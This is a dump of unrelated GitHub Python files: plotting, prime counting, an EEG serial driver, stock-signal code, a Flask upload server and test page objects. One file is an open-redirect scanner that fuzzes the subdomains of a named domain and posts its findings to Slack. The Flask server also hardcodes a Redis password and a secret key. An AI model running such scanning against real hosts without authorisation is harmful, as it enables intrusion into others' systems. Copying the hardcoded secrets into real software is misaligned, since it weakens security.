markersize=10)\n ax.set_title(\"Plot № %d\" % i)\n plt.savefig(\"Plot № %d.jpg\" % i, dpi=800)\n\n\nfor i in range(1, 6):\n f = open(f\"dead_moroz/00{i}.dat\", 'r')\n x = []\n y = []\n a = [i.rstrip() for i in f.readlines()]\n a[int(a[0]) + 1::] = []\n del a[0]\n for j in a:\n x.append(float(j.split()[0]))\n y.append(float(j.split()[1]))\n a = []\n plotting(x, y)\n f.close()\n","repo_name":"ArtemEvstafev/2022_Evstafev_Python","sub_path":"Lab1_MatPlotLib/Ex1/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"74020717095","text":"'''\n프로그램명 : 1978.py\n작성자 : 권혁진\n작성일 : 2020-09-18\n설명 : 소수 찾기\n참조 : https://www.acmicpc.net/problem/1978\n'''\n\ndef is_prime_number(num):\n if num < 2:\n return False\n\n if num == 2:\n return True\n\n if num % 2 == 0:\n return False\n\n for i in range(3, num):\n if num % i == 0:\n return False\n\n return True\n\ncount = int(input())\nnum_list = list(map(int, input().split()))\nprime_cnt = 0\n\nfor num in num_list: \n if is_prime_number(num):\n prime_cnt += 1\n\nprint(prime_cnt)","repo_name":"chaltteog/AlgorithmofPython","sub_path":"code/backjoon/1978/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71629260458","text":"import time\nimport sys\nfrom core.subdomains import subdomainsall,addprotocol\nfrom core.multi_requests import multiget,multipost\nfrom core.networking import isalive\nfrom core.files import readfile\nfrom core.output import sendtoslack,writetofile\nfrom core.networking import iswildcard\nfrom core.timendate import current_en_time\nfrom core.wayback import waybackparamurls\nfrom core.urls import fuzzableurls\n\n#Insert time\nxtime=current_en_time()\nwritetofile('../output/open_redirect/output/open_redirect.txt', xtime)\n\nredirect_url='http://www.example.com'\ncount=0\npayloadsx=[]\nsubdomains=subdomainsall('../target-data/test.txt')\nfile_payload=readfile('../payloads/leaked_files.txt')\npayload=[]\nfuzzabl_urls=fuzzableurls(waybackparamurls('miraki.com', False),redirect_url)\nfor line in file_payload:\n\tpayloads.append(line)\nfor line in fuzzabl_urls:\n\tpayloadsx.append(line)\n\nfor line in payloadsx:\n\txline=line.lstrip('/')\n\tpayloads.append(line)\nfor subdomain in subdomains:\n\tcount+=1\n\tif(count%1000==0):\n\t\tsendtoslack(\"[~] Status (open_redirect) :\\nTotal Domains:\"+str(len(subdomains))+\"\\n\"+\"Domains Scanned: \"+str(count))\n\tif isalive(subdomain):\n\t\twritetofile('../output/open_redirect/logs/open_redirect.log',subdomain)\n\t\tnew_subdomain=addprotocol(subdomain, 'http')\n\t\tress=multiget(new_subdomain, payloads)\n\t\tfor res in ress:\n\t\t\ttry:\n\t\t\t\tfor a in res['response'].history:\n\t\t\t\t\tdatax={}\n\t\t\t\t\tif a.status_code==302 and 'example' in a.headers['location']:\n\t\t\t\t\t\tvul_url=str('\\n'+new_subdomain+res['word'])\n\t\t\t\t\t\tmsg='[~] Open Redirect: '+vul_url\n\t\t\t\t\t\tsendtoslack(msg)\n\t\t\t\t\t\twritetofile('../output/open_redirect/output/open_redirect.txt', vul_url)\n\t\t\texcept:\n\t\t\t\tpass\n\n\telse:\n\t\tprint('Skipping Wildcard',subdomain)\n\n","repo_name":"imran-parray/Automation-project","sub_path":"scanners/old/open-redirect.py","file_name":"open-redirect.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"70213358056","text":"# from open_bci_v3.py in OpenBCI's python-sdk, as is most of the openbci-specific code here.\n\nimport serial\nimport numpy as np\nimport struct\nimport time\nimport wx\nimport sys\nimport glob\n\nfrom cebl import util\nfrom cebl.rt import widgets\n\nfrom cebl.rt.sources.source import Source, SourceConfigPanel\n\n\nSAMPLE_RATE = 250.0 # Hz\nSTART_BYTE = 0xA0 # start of data packet\nEND_BYTE = 0xC0 # end of data packet\nADS1299_VREF = 4.5 #reference voltage for ADC in ADS1299. set by its hardware\nADS1299_GAIN = 24.0 #assumed gain setting for ADS1299. set by its Arduino code\nSCALE_uVOLTS_PER_COUNT = ADS1299_VREF/float((pow(2,23)-1))/ADS1299_GAIN*1000000.\nSCALE_ACCEL_G_PER_COUNT = 0.002 /(pow(2,4)) #assume set to +/4G, so 2 mG\n\nclass OpenBCIConfigPanel(SourceConfigPanel):\n def __init__(self, parent, src, *args, **kwargs):\n SourceConfigPanel.__init__(self, parent=parent, src=src, *args, **kwargs)\n\n self.initPollSizeSelector()\n self.initLayout()\n\n def initPollSizeSelector(self):\n pollSizeControlBox = widgets.ControlBox(self, label='Poll Size', orient=wx.HORIZONTAL)\n self.pollSizeSpinCtrl = wx.SpinCtrl(self, style=wx.SP_WRAP,\n value=str(self.src.pollSize), min=1, max=32)\n pollSizeControlBox.Add(self.pollSizeSpinCtrl, flag=wx.ALL | wx.EXPAND, border=10)\n self.Bind(wx.EVT_SPINCTRL, self.setPollSize, self.pollSizeSpinCtrl)\n\n self.sizer.Add(pollSizeControlBox, proportion=0,\n flag=wx.ALL, border=10)\n\n def setPollSize(self, event=None):\n self.src.pollSize = self.pollSizeSpinCtrl.GetValue()\n\nclass OpenBCI(Source):\n \"\"\"OpenBCI data source.\n \"\"\"\n def __init__(self, mgr, sampRate=250,\n chans=('EEG1','EEG2','EEG3','EEG4','EEG5','EEG6','EEG7','EEG8'),\n pollSize=1):\n \"\"\"Construct a new OpenBCI source.\n \"\"\"\n # initialize source parent class\n\n # chans = ('FZ', 'CZ', 'PZ', 'OZ', 'P3', 'P4', 'P7', 'P8')\n chans = ('C1','C2', 'C3', 'C4', 'C5', 'C7', 'CZ', 'PZ')\n\n\n Source.__init__(self, mgr, sampRate=sampRate, chans=chans,\n name='OpenBCI', configPanelClass=OpenBCIConfigPanel)\n\n # self.batteryScale = 4.2 - 1.28 / 16\n self.acceloScale = SCALE_ACCEL_G_PER_COUNT\n self.dataScale = SCALE_uVOLTS_PER_COUNT\n\n self.baudrate = 115200\n self.timeout = 4\n self.connected = False\n self.handshaking = False\n self.description = 'OpenBCI V3 - 8'\n self.device = None\n\n # observations collected in each poll\n self.pollSize = pollSize\n self.firstPoll = True\n\n ## Connection\n #####################################\n\n def find_port(self): # from openbci code\n # Finds the serial port names\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i+1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n ports = glob.glob('/dev/ttyUSB*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.usbserial*')\n else:\n raise EnvironmentError('Error finding ports on your operating system')\n print('ports',ports)\n openbci_port = ''\n for port in ports:\n try:\n s = serial.Serial(port= port, baudrate = self.baudrate, timeout=self.timeout)\n time.sleep(1)\n s.write(b's') # Chuck added. didn't work without this.\n time.sleep(1)\n # flush\n n = s.inWaiting()\n if n > 0:\n b = s.read(n)\n s.write(b'v')\n openbci_serial = self.openbci_id(s)\n s.close()\n print(openbci_serial)\n if openbci_serial:\n openbci_port = port;\n except (OSError, serial.SerialException):\n pass\n if openbci_port == '':\n raise OSError('Cannot find OpenBCI port')\n else:\n return openbci_port\n\n def connect(self):\n wx.LogMessage(self.getName() + ': connecting.')\n try:\n if not self.connected:\n port = '/dev/ttyUSB0' # self.find_port() # like '/dev/ttyUSB0'\n self.device = serial.Serial(port = port, baudrate = 115200, timeout = None)\n # print('device is',self.device)\n time.sleep(1)\n self.device.write(b's') # stop\n time.sleep(1)\n self.device.write(b'v') # init 32-bit board\n time.sleep(1)\n # self.description = self.getConfig()\n # print('desc is',self.description)\n\n self.device.baudrate = 115200 # has no effect in above statement\n # self.device.open()\n\n self.stopAcquisition()\n\n # self.configuration = self.getConfig()\n self.connected = True\n except Exception as e:\n self.connected = False\n raise RuntimeError('Failed to connect to OpenBCI: ' + str(e))\n\n # def read_incoming_text(self):\n # if self.device.inWaiting():\n # lines = ''\n # line = self.device.read().decode('utf-8')\n # # Look for end sequence $$$\n # while '$$$' not in line:\n # lines += line.replace('$$$','')\n # return lines\n # else:\n # return ''\n\n def disconnect(self):\n wx.LogMessage(self.getName() + ': disconnecting.')\n if self.connected is False or not self.device.isOpen():\n wx.LogMessage(self.getName() + ': already disconnected.')\n self.connected = False\n self.device = None\n return\n\n try:\n #time.sleep(1)\n self.device.close()\n\n except Exception as e:\n raise RuntimeError('Failed to disconnect from OpenBCI: ' + str(e))\n\n finally:\n self.connected = False\n self.device = None\n\n def startAcquisition(self):\n # send start command\n # self.stopAcquisition() Now done in beforeStart\n print('sending start command b')\n self.device.write(b'b')\n\n def stopAcquisition(self):\n # send stop command\n self.device.write(b's')\n time.sleep(1)\n\n try:\n n = self.device.inWaiting()\n print('stopAcquisition has',n,'bytes waiting and will read them')\n if n > 0:\n dumpBuffer = self.device.read(n)\n print( 'dumpBuffer len: ', len(dumpBuffer))\n\n except Exception as e:\n pass\n\n ## Configuration\n #####################################\n\n def getConfig(self):\n self.device.write(b'?')\n print('waiting after ? command')\n time.sleep(3)\n reply = ''\n n = self.device.inWaiting()\n print('there are',n,'bytes waiting')\n if n > 0:\n reply = self.device.read(n)\n\n # ack, pan_id_bs, pan_id_hs, addr_bs, addr_hs, channel_bs, channel_hs, handshaking, free_channels, huh, checksum = \\\n # struct.unpack('>bHHHHBB?H?H',reply)\n\n # return pan_id_bs, pan_id_hs, addr_bs, addr_hs, channel_bs, channel_hs, handshaking, free_channels\n print('getConfig returned')\n print(reply)\n self.description = reply\n return reply\n\n def query(self):\n try:\n self.connect()\n time.sleep(1)\n self.disconnect()\n time.sleep(1)\n\n except Exception as e:\n raise RuntimeError('Failed to query OpenBCI: ' + str(e))\n\n return repr(self)\n\n ## Data management\n #####################################\n\n def beforeStart(self):\n try:\n print('beforeStart')\n self.connect()\n print('beforeState after connect')\n self.stopAcquisition()\n # # self.startAcquisition()\n # print('inWaiting..',self.device.inWaiting())\n # if self.device.inWaiting() > 0:\n # junk = self.device.read(self.device.inWaiting())\n # time.sleep(1)\n # print('after read: inWaiting..',self.device.inWaiting())\n self.startAcquisition()\n print('returned from startAcquisition')\n\n except Exception as e:\n raise RuntimeError('Failed to start OpenBCI acquisition: ' + str(e))\n\n def afterStop(self):\n try:\n self.stopAcquisition()\n\n except:\n raise\n\n finally:\n self.disconnect()\n\n def pollData(self):\n ## Incoming Packet Structure:\n ## Start Byte(1), Sample ID(1), Channel Data(24), Acc Data(6), End Byte(1)\n ## 0xA0, 0-255, 8 3-byte signed ints, 3 2-byte signed ints, 0xC0\n ## total packet size is 1+1+24+6+1 = 33\n\n ## This code only extracts the 8 EEG channels.\n # print('pollData')\n scanSize = 33 # bytes per scan, fixed by hardware\n\n NCHANNELS = len(self.chans)\n\n eeg = np.empty((self.pollSize, NCHANNELS))\n # accelerometers = np.empty((self.pollSize, 3))\n # ids = np.empty((self.pollSize,1))\n\n eegIndices = np.array([2,5,8,11,14,17,20,23])[:NCHANNELS]\n # eegIndices = np.array([2,5]) #eegIndices([2,5]) #s:NCHANNELS)\n\n # accFirstIndex = 26\n\n # print('pollData before read of',scanSize*self.pollSize)\n reply = self.device.read(scanSize * self.pollSize)\n # print('pollData after read',len(reply))\n\n startByte,sampleId = struct.unpack('BB',reply[:2])\n\n # print('sampleId',sampleId,'startbyte',startByte,'inwaiting',self.device.inWaiting())\n\n for polli in range(self.pollSize):\n # big-endian\n\n eeg[polli,:] = [struct.unpack('>i', (b'\\x00' if reply[i] < 0x80 else b'\\xff') +\n reply[i:i+3])[0] for i in eegIndices+(polli*scanSize)]\n #eeg[polli,:] = np.array([struct.unpack('>i', (b'\\x00' if reply[i] < 0x80 else b'\\xff') + reply[i:i+3])[0] for i in eegIndices+(polli*self.pollSize)])\n\n # acci = accFirstIndex + polli * self.pollSize\n # accelerometers[polli,:] = struct.unpack('>hhh', packet[acci:acci+6])\n # ids[polli,:] = packet[1 + (polli * self.pollSize)]\n\n eeg *= SCALE_uVOLTS_PER_COUNT\n\n return eeg\n\n ## Magic\n #####################################\n\n def __repr__(self):\n r = Source.__repr__(self)\n r += '\\nHardware:\\n' + \\\n '====================\\n' + \\\n 'Description: ' + str(self.description) + '\\n' + \\\n '====================\\n'\n\n self.connected = False\n self.description = ''\n return r\n","repo_name":"idfah/cebl","sub_path":"cebl/rt/sources/openbci/openbci.py","file_name":"openbci.py","file_ext":"py","file_size_in_byte":10772,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"90"} +{"seq_id":"42883742954","text":"# 判断各种走势\nimport tushare as ts\nimport threading\n\nlock = threading.Lock()\n\nsumCode = 0\nsucc = 0\nsucc3 = 0\nsucc5 = 0\nsumCode2 = 0\ndefe = 0\ndefe3 = 0\ndefe5 = 0\nhighestList = {'days': [i for i in range(1, 40)], 'times': [0 for i in range(1, 40)]}\nlowestList = {'days': [i for i in range(1, 40)], 'times': [0 for i in range(1, 40)]}\nmvpList = {}\n\n\nclass Judge(object):\n\n def judgeTwiceCross(self, code, histogtam, dif, codeDict):\n\n global sumCode\n global succ\n global succ3\n global succ5\n global sumCode2\n global defe\n global defe3\n global defe5\n for i in range(1, len(histogtam['value']) - 3):\n if histogtam['value'][i] > 0 and histogtam['value'][i + 1] < 0: # 红绿\n date1 = histogtam['date'][i]\n date2 = histogtam['date'][i + 2]\n date3 = histogtam['date'][i + 3]\n dif1 = dif['value'][dif['date'].index(date1)]\n dif2 = dif['value'][dif['date'].index(date2)]\n lock.acquire()\n if 0.5 < dif2 and 0.5 < dif1 and self.judgeTopDivergence(codeDict, dif1, dif2, date1, date2):\n print('出现高位二次死叉,死叉出现的时间分别为:', date1, \",\", date2, \"。\\n预计在\", date2, \",该只股票会连续下跌\")\n sumCode2 += 1\n ratio2, lowestDays = self.scoring2(code, date2, date3)\n if ratio2 <= 1:\n defe += 1\n if ratio2 <= 0.97:\n defe3 += 1\n if ratio2 <= 0.95:\n defe5 += 1\n lowestList['times'][lowestDays] += 1\n self.addMvp(code, ratio2)\n lock.release()\n\n if histogtam['value'][i] < 0 and histogtam['value'][i + 1] > 0: # 绿红\n date1 = histogtam['date'][i]\n date2 = histogtam['date'][i + 2]\n date3 = histogtam['date'][i + 3]\n dif1 = dif['value'][dif['date'].index(date1)]\n dif2 = dif['value'][dif['date'].index(date2)]\n lock.acquire()\n if dif1 + 0.2 < dif2 < 0 and self.judgeBottomDivergence(codeDict, dif1, dif2, date1, date2): # 低位二次金叉\n print('出现低位二次金叉,金叉出现的时间分别为:', date1, \",\", date2,\n \"。\\n预���在\", date2, \",该只股票会连续上涨\")\n sumCode += 1\n ratio, highestDays = self.scoring(code, date2, date3)\n if ratio >= 1:\n succ += 1\n if ratio >= 1.03:\n succ3 += 1\n if ratio >= 1.05:\n succ5 += 1\n highestList['times'][highestDays] += 1\n lock.release()\n\n def judgeTopDivergence(self, data, dif1, dif2, date1, date2): # 判断顶背离\n if dif1 > dif2 and data['high'][data['date'].index(date1)] < data['low'][data['date'].index(date2)]:\n print(\"出现顶背离,\", end=\"\")\n return 1\n\n def judgeBottomDivergence(self, data, dif1, dif2, date1, date2): # 判断底背离\n if dif1 < dif2 and data['low'][data['date'].index(date1)] > data['high'][data['date'].index(date2)]:\n print(\"出现底背离,\", end=\"\")\n return 1\n\n def scoring(self, code, date2, date3):\n data = ts.get_hist_data(code, start=str(date2), end=str(date3))\n highestClose = 0\n highestDays = 0\n if data is not None:\n for i in range(len(data) - 1):\n if data['close'][i] > highestClose:\n highestClose = data['close'][i]\n if data['close'][i] > data['close'][i + 1]: # 按日期倒序排列\n highestDays += 1\n ratio = highestClose / data['close'][len(data['close']) - 1]\n return ratio, highestDays # 最大涨幅\n\n def scoring2(self, code, date2, date3):\n data = ts.get_hist_data(code, start=str(date2), end=str(date3))\n lowestClose = 1000\n lowestDays = 0\n if data is not None:\n for i in range(len(data['close']) - 1):\n if data['close'][i] < lowestClose:\n lowestClose = data['close'][i]\n if data['close'][i] < data['close'][i + 1]:\n lowestDays += 1\n\n ratio2 = lowestClose / data['close'][len(data['close']) - 1]\n return ratio2, lowestDays # 最大跌幅\n\n def addMvp(self, code, ratio):\n if len(mvpList) < 10:\n mvpList.update({code: ratio})\n else:\n mvpList.pop(min(mvpList, key=mvpList.get))\n mvpList.update({code: ratio})\n","repo_name":"lsy81212/pythonWork","sub_path":"judgeTrend.py","file_name":"judgeTrend.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9009372042","text":"from flask import Flask, render_template, jsonify, redirect, request, url_for\nfrom werkzeug.utils import secure_filename\nfrom redis import Redis\nfrom rq import Queue\nfrom task import background_task\nfrom flask_cors import CORS, cross_origin\nimport logging\nimport os\n\nUPLOAD_FOLDER = 'sandbox/files'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\napp = Flask(__name__, static_folder='static', static_url_path='')\ncors = CORS(app)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.secret_key = 'some secret key'\n\napp.config['CORS_HEADERS'] = 'Content-Type'\nlogging.basicConfig(level=logging.DEBUG)\nq = Queue(connection=Redis(host='redis', port=6379, db=0, password=\"sOmE_sEcUrE_pAsS\"))\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n logging.info('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n logging.info('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('uploaded_file',\n filename=filename))\n return '''\n \n Upload new File\n

Upload new File

\n
\n \n \n
\n '''\n\n\n@app.route('/run_task')\n@cross_origin()\ndef run_task():\n # job = q.enqueue(background_task, \"12\")\n #\n # return jsonify({\"data\": f\"Task ({job.id}) added to queue at {job.enqueued_at}\"})\n\n return jsonify({\"data\": f\"Task ({1}) added to queue at {1}\"})\n\n\n@app.template_filter()\ndef vue(item):\n # If you see anything about \"raw\", blame the blog engine, not me. If not,\n # ignore these comments.\n return \"{{ \" + item + \" }}\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3000, debug=True)\n","repo_name":"Ivanhahanov/ECMSystem-with-IPS","sub_path":"NTSecurity/app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19933303170","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-05-20 17:00:40\n# @Author : chensijia (2350543676@qq.com)\n# @Version : 0.0.0\n# @Style : Python3.4\n#\n# @Description: operate the hash style features\n\n# pd.DataFrame(d.items()) # or list(d.items())\n\n\n## import python`s own lib\nimport os\nimport re\nimport pickle\nfrom itertools import chain\nfrom collections import OrderedDict\n\n## import third party lib\nimport pandas as pd\n\n## import local lib\n\n\n\n\nDATA_DIR = \"../season_1_sad/\" # only change this dir to change the operate dir\n\nTRAIN_FLAG = True\nCONCRETE_DIR = \"training_data\" if TRAIN_FLAG else \"test_set_1\"\n\n## all the data dir we want to solve\nCLUSTER_MAP_SHEET_DIR = \"cluster_map\"\nORDER_SHEET_DIR = \"order_data\"\nTRAFFIC_SHEET_DIR = \"traffic_data\"\nWEATHER_SHEET_DIR = \"weather_data\"\nPOI_SHEET_DIR = \"poi_data\"\n\n\n\nclass MyDistrictHashMapDict(dict):\n def __missing__(self, key):\n self[key] = max(self.values()) + 1\n return self[key]\n\nclass MyIDHashMapDict(dict):\n def __missing__(self, key):\n if not len(list(self.values())) == 0:\n self[key] = max(self.values()) + 1\n else:\n self[key] = 1 \n return self[key]\n\ndef create_hash_district_map_dict():\n print(\"creating map rule...\")\n file = \"cluster_map.csv\"\n district_hash_map_path = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, file)\n\n hash_data = pd.read_csv(district_hash_map_path)\n ## convert the dataframe into dict\n hash_map_rule = MyDistrictHashMapDict(zip(hash_data.district_hash, hash_data.district_map))\n \n #print(type(hash_map_rule))\n\n saved_file = \"cluster_map.pickle\"\n map_save_file = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, saved_file)\n ## save into same dir as file\n with open(map_save_file, \"wb\") as f:\n pickle.dump(hash_map_rule, f)\n\n #print(hash_map_rule)\n\n\ndef map_additional(x, map_rule):\n if type(x) == str:\n x = map_rule[x]\n return x\n\n# map the district features in the input data_frame into value\ndef district_hash_map(data_frame):\n district_map_f = \"cluster_map.pickle\"\n district_map_f_path = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, \n district_map_f)\n if not os.path.exists(district_map_f_path):\n print(\"not existed, so we create one\")\n create_hash_district_map_dict()\n # load the needed map file\n \n map_rule = MyDistrictHashMapDict()\n with open(district_map_f_path, \"rb\") as f:\n map_rule = pickle.load(f)\n\n print(\"map_rule: \", type(map_rule))\n # map the needed cols..\n for i in range(len(data_frame.columns)):\n if \"district_hash\" in data_frame.columns[i]:\n # map the hash according to the map rule\n district_hash_col = data_frame.columns[i]\n data_frame[district_hash_col] = data_frame[district_hash_col].replace(map_rule)\n #print(type(data_frame[district_hash_col][23]))\n # ## solve the district hash that not mapped\n data_frame[district_hash_col] = data_frame[district_hash_col].apply(lambda x: map_additional(x, map_rule))\n # after mapping, delete its hash str\n new_name = re.sub(\"_hash\",\"\",district_hash_col)\n data_frame.rename(columns={district_hash_col: new_name}, inplace = True)\n\n with open(district_map_f_path, \"wb\") as f:\n pickle.dump(map_rule, f)\n return data_frame\n\n\n## input the dir you want to map the hash\ndef district_hash_map_dir(needed_map_dir):\n if not os.path.isdir(needed_map_dir) or not os.path.exists(needed_map_dir):\n raise IOError(\"ERROR: \" + needed_map_dir + \" not existed or its not a dir\")\n print(\"mapping all the district... in \" + needed_map_dir)\n for file in os.listdir(needed_map_dir):\n if \".csv\" in file:\n file_path = os.path.join(needed_map_dir, file)\n # map all the district into concrete value\n mapped_data_frame = district_hash_map(pd.read_csv(file_path))\n # change the file\n mapped_data_frame.to_csv(file_path, index = False, na_rep = \"NULL\")\n\n\n\n\n###################### id hash map #################################\n\n### we should distinguish the:\n# - order_id\n# - driver_id\n# - passenger_id\n## according to the input: map_rule_name(str only)\n\ndef id_hash_map(data_frame, map_rule_name):\n print(\"need to map: \" + map_rule_name)\n\n saved_file = map_rule_name + \".pickle\"\n id_map_f_path = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, saved_file)\n id_map_rule = MyIDHashMapDict()\n # this data_frame is the one needed to be mapped\n if map_rule_name in data_frame.columns:\n # load the needed map file\n if os.path.exists(id_map_f_path):\n with open(id_map_f_path, \"rb\") as f:\n id_map_rule = pickle.load(f)\n\n\n # map the needed cols..\n for i in range(len(data_frame.columns)):\n if map_rule_name == data_frame.columns[i]:\n print(\"mapping id: \", map_rule_name)\n # map the hash according to the map rule\n id_hash_col = data_frame.columns[i]\n \n if id_map_rule:\n # map the id --> value contained in the map rule\n data_frame[id_hash_col] = data_frame[id_hash_col].replace(id_map_rule)\n # map the additional\n data_frame[id_hash_col] = data_frame[id_hash_col].apply(lambda x: map_additional(x, id_map_rule))\n else:\n data_frame[id_hash_col] = data_frame[id_hash_col].apply(lambda x: map_additional(x, id_map_rule))\n # after mapping, delete its hash str\n new_name = re.sub(\"_id\",\"\",id_hash_col)\n data_frame.rename(columns={id_hash_col: new_name}, inplace = True)\n with open(id_map_f_path, \"wb\") as f:\n pickle.dump(id_map_rule, f)\n return data_frame\n\n\ndef id_hash_map_dir(needed_map_dir, map_rule_name):\n if not os.path.isdir(needed_map_dir) or not os.path.exists(needed_map_dir):\n raise IOError(\"ERROR: \" + needed_map_dir + \" not existed or its not a dir\")\n print(\"mapping all the id... in \" + needed_map_dir)\n for file in os.listdir(needed_map_dir):\n if \".csv\" in file:\n file_path = os.path.join(needed_map_dir, file)\n # map all the district into concrete value\n mapped_data_frame = id_hash_map(pd.read_csv(file_path), map_rule_name)\n # change the file\n mapped_data_frame.to_csv(file_path, index = False, na_rep = \"NULL\")\n\n\nif __name__ == '__main__':\n ################# traffic data district hash map ###############\n # data_frame = pd.read_csv(os.path.join(DATA_DIR, CONCRETE_DIR, TRAFFIC_SHEET_DIR, \n # \"traffic_data_2016-01-01.csv\"))\n # data_frame = district_hash_map(data_frame)\n # print(data_frame)\n # district_hash_map_dir()\n\n\n\n ################ order data district hash map ###################\n data_frame = pd.read_csv(os.path.join(DATA_DIR, CONCRETE_DIR, ORDER_SHEET_DIR, \n \"order_data_2016-01-01.csv\"))\n# data_frame = district_hash_map(data_frame)\n data_frame = id_hash_map(data_frame, \"passenger_id\")\n print(data_frame)\n # data_frame = pd.read_csv(os.path.join(DATA_DIR, CONCRETE_DIR, ORDER_SHEET_DIR, \n # \"order_data_2016-01-01.csv\"))\n # df = district_hash_map(data_frame)\n # print(df) \n # df.to_csv(\"asdfdsffsdasdaf.csv\", index = False, na_rep = \"NULL\")\n","repo_name":"Heipiao/coding","sub_path":"operate_hash.py","file_name":"operate_hash.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"39573342869","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import BasePage\n\n\nclass TexBoxPage(BasePage):\n\n def fill_all_fields(self, form_data: dict):\n self.find_element(self.Locators.FULL_NAME).send_keys(form_data.get(\"user_name\"))\n self.find_element(self.Locators.USER_EMAIL).send_keys(form_data.get(\"user_email\"))\n self.find_element(self.Locators.CURRENT_ADDR).send_keys(form_data.get(\"current_addr\"))\n self.find_element(self.Locators.PERMANENT_ADDR).send_keys(form_data.get(\"permanent_addr\"))\n\n def click_on_submit(self):\n self.find_and_scroll(self.Locators.SUBMIT_BUTTON).click()\n\n def get_created_fields(self):\n paragraphs = self.find_elements(self.Locators.CREATED_FIELDS)\n user_name = paragraphs[0].text.split(':')[-1]\n user_email = paragraphs[1].text.split(':')[-1]\n current_addr = paragraphs[2].text.split(':')[-1]\n permanent_addr = paragraphs[3].text.split(':')[-1]\n\n return dict(\n user_name=user_name,\n user_email=user_email,\n current_addr=current_addr,\n permanent_addr=permanent_addr\n )\n\n\n\n class Locators:\n FULL_NAME = (By.ID, \"userName\")\n USER_EMAIL = (By.ID, \"userEmail\")\n CURRENT_ADDR = (By.ID, \"currentAddress\")\n PERMANENT_ADDR = (By.ID, \"permanentAddress\")\n SUBMIT_BUTTON = (By.CSS_SELECTOR, \"button#submit\")\n CREATED_FIELDS = (By.CSS_SELECTOR, \"div#output p\")\n\n\nclass ButtonsPage(BasePage):\n\n def click_on_button(self):\n self.find_element(self.Locators.LCLICK_BUTTON).click()\n\n def get_msg_shown(self):\n return self.find_element(self.Locators.LCLICK_MSG).text\n\n class Locators:\n LCLICK_BUTTON = (By.XPATH, \"//button[text()='Click Me']\")\n LCLICK_MSG = (By.CSS_SELECTOR, \"p#dynamicClickMessage\")\n","repo_name":"dmytroPPK/qaauto-course","sub_path":"lesson19/pages/elements_page.py","file_name":"elements_page.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"32287294957","text":"def countCharacters(words, chars):\n good_arr = []\n for word in words:\n str = chars\n good = True\n print(\"word is\",word)\n print (\"str is\", str)\n for letter in word:\n print(\"letter is\", letter)\n if letter in str:\n index = str.find(letter)\n str = str[:index] + str[(index +1):]\n print(\"str is\", str)\n else:\n good = False\n break\n\n if good:\n good_arr.append(len(word))\n\n return sum(good_arr)\n","repo_name":"Mariamjaludi/algorithms-practice","sub_path":"python/count_character.py","file_name":"count_character.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"33776718519","text":"import configparser\nfrom fsactionedit.amigaactions import AmigaActions\n\n\nclass ConfigHandler:\n\n def __init__(self):\n self.amigaactions = AmigaActions()\n self._loaded_config = None\n self._loaded_configfile = None\n self._our_config = None\n self._non_action_count = 0\n\n @property\n def loaded_config(self):\n return self._loaded_config\n\n @loaded_config.setter\n def loaded_config(self, value):\n if not isinstance(value, configparser.ConfigParser) and value is not None:\n raise TypeError('Cannot assign this shit as a loaded config.')\n else:\n self._loaded_config = value\n if value is None:\n self._loaded_configfile = None\n\n @property\n def loaded_configfile(self):\n return self._loaded_configfile\n\n @property\n def non_action_count(self):\n return self._non_action_count\n\n def load(self, configfile):\n \"\"\"Load config from file,\n return actions (key = val) or None on error.\"\"\"\n self._non_action_count = 0\n self._loaded_config = configparser.ConfigParser(\n delimiters=('=',), strict=False)\n try:\n cfglist = self._loaded_config.read(configfile)\n except configparser.Error:\n return None\n if len(cfglist) == 0 or self._loaded_config.has_section('fs-uae') is False:\n return None\n self._loaded_configfile = configfile\n action_opts = []\n for opt, val in self._loaded_config.items('fs-uae'):\n print(opt, val)\n if self.amigaactions.is_valid(val):\n action_opts.append('{0} = {1}'.format(opt, val))\n else:\n self._non_action_count += 